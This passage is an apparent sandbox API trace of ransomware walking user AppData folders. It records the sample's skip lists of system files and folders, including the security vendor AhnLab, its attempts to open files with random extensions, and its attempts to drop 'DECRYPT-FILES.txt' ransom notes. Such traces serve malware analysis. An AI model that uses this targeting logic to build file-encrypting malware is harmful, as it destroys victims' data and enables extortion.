ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.377] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.378] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x642afa0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0ab3980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", cAlternateFileName="BE5B4F~1.DDU")) returned 1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="DECRYPT-FILES.txt") returned -1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="autorun.inf") returned 1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="boot.ini") returned -1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="desktop.ini") returned -1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="ntuser.dat") returned -1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="iconcache.db") returned -1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="bootsect.bak") returned -1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="ntuser.dat.log") returned -1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="thumbs.db") returned -1 [0186.378] lstrcmpiW (lpString1="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr", lpString2="Bootfont.bin") returned -1 [0186.378] lstrlenW (lpString="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr") returned 42 [0186.378] lstrcmpiW (lpString1="dduZr", lpString2="lnk") returned -1 [0186.378] lstrcmpiW (lpString1="dduZr", lpString2="exe") returned -1 [0186.378] lstrcmpiW (lpString1="dduZr", lpString2="sys") returned -1 [0186.378] lstrcmpiW (lpString1="dduZr", lpString2="dll") returned -1 [0186.378] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 97 [0186.378] lstrlenW (lpString="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr") returned 42 [0186.378] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0186.378] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr" [0186.378] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.378] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduZr" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.dduzr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.378] CloseHandle (hObject=0x0) returned 0 [0186.378] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.379] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0ab3980, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ab3980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ab3980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.379] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.379] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred.mHz03", cAlternateFileName="PREFER~1.MHZ")) returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="DECRYPT-FILES.txt") returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="autorun.inf") returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="boot.ini") returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="desktop.ini") returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="ntuser.dat") returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="iconcache.db") returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="bootsect.bak") returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="ntuser.dat.log") returned 1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="thumbs.db") returned -1 [0186.379] lstrcmpiW (lpString1="Preferred.mHz03", lpString2="Bootfont.bin") returned 1 [0186.379] lstrlenW (lpString="Preferred.mHz03") returned 15 [0186.379] lstrcmpiW (lpString1="mHz03", lpString2="lnk") returned 1 [0186.379] lstrcmpiW (lpString1="mHz03", lpString2="exe") returned 1 [0186.379] lstrcmpiW (lpString1="mHz03", lpString2="sys") returned -1 [0186.379] lstrcmpiW (lpString1="mHz03", lpString2="dll") returned 1 [0186.379] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 97 [0186.379] lstrlenW (lpString="Preferred.mHz03") returned 15 [0186.379] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0186.379] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="Preferred.mHz03" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.mHz03") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.mHz03" [0186.379] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.379] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.mHz03" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.mhz03"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.380] CloseHandle (hObject=0x0) returned 0 [0186.380] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.380] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred.mHz03", cAlternateFileName="PREFER~1.MHZ")) returned 0 [0186.380] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.381] CloseHandle (hObject=0xffffffff) returned 0 [0186.381] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3111613574-2524581245-2586426736-500\\", cAlternateFileName="S-1-5-~1")) returned 0 [0186.381] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0186.381] CloseHandle (hObject=0xffffffff) returned 0 [0186.381] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0186.381] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0186.381] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0186.381] lstrcatW (in: lpString1="SystemCertificates", lpString2="\\" | out: lpString1="SystemCertificates\\") returned="SystemCertificates\\" [0186.381] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="SystemCertificates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Program Files") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch=":\\Windows") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Games\\") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\All Users") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="AhnLab") returned 0x0 [0186.381] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.381] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 62 [0186.381] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.381] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\0a16c9.tmp") returned 73 [0186.381] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.382] GetLastError () returned 0x5 [0186.382] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 62 [0186.382] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.382] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\DECRYPT-FILES.txt") returned 80 [0186.382] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.382] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 62 [0186.382] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0186.382] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0186.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.383] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.383] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.383] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.383] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0ad9ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0ad9ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0ad9ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.383] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.383] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0186.383] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0186.383] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0186.383] lstrcatW (in: lpString1="My", lpString2="\\" | out: lpString1="My\\") returned="My\\" [0186.383] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="My\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Program Files") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch=":\\Windows") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Games\\") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\All Users") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="AhnLab") returned 0x0 [0186.383] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.383] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 65 [0186.383] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.383] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\0a16c9.tmp") returned 76 [0186.383] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.390] GetLastError () returned 0x5 [0186.390] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 65 [0186.390] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.390] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\DECRYPT-FILES.txt") returned 83 [0186.390] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\systemcertificates\\my\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.391] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 65 [0186.392] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0186.392] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.392] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.392] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.392] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.392] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.392] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0affc40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0affc40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0186.392] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0186.392] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0186.392] lstrcatW (in: lpString1="Certificates", lpString2="\\" | out: lpString1="Certificates\\") returned="Certificates\\" [0186.392] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="Certificates\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0186.392] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Program Files") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch=":\\Windows") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Games\\") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.393] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.393] StrStrW 